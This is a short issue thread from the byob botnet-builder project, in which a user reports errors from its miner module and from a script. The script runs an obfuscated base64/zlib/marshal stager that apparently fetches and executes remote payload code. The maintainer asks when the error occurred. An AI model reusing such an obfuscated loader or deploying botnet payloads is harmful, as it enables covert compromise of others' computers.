### ISSUE TITLE
This is a very serious problem

### ISSUE THREAD

**Issue by cxaqhq** [malwaredllc/byob#229]
Traceback (most recent call last):
  File "/usr/lib/python2.7/multiprocessing/process.py", line 267, in _bootstrap
    self.run()
  File "/home/cx/cx/byob/byob/core/miner.py", line 61, in run
    r = json.loads(line)
  File "/usr/lib/python2.7/json/__init__.py", line 339, in loads
    return _default_decoder.decode(s)
  File "/usr/lib/python2.7/json/decoder.py", line 364, in decode
    obj, end = self.raw_decode(s, idx=_w(s, 0).end())
  File "/usr/lib/python2.7/json/decoder.py", line 382, in raw_decode
    raise ValueError("No JSON object could be decoded")
ValueError: No JSON object could be decoded

--------------------------------------------------------------------------------------------------------------

C:\Users\cx\Desktop\byob>python cx.py
Traceback (most recent call last):
  File "cx.py", line 5, in <module>
    exec(eval(marshal.loads(zlib.decompress(base64.b64decode('eJwrtmJgYCgtyskvSM3TUM8oKSmw0tc3tDTSMzSz0DPWMzeysjCwMNTXLy5JTE8tKtYvj7LQK6hU19QrSk1M0dAEAC91Edc=')))))
  File "<string>", line 1
    <head>
    ^
SyntaxError: invalid syntax

**Comment by malwaredllc** [comment]
@cxaqhq When did this error occur? Did this happen when you ran the miner command? Or just when you executed the payload?
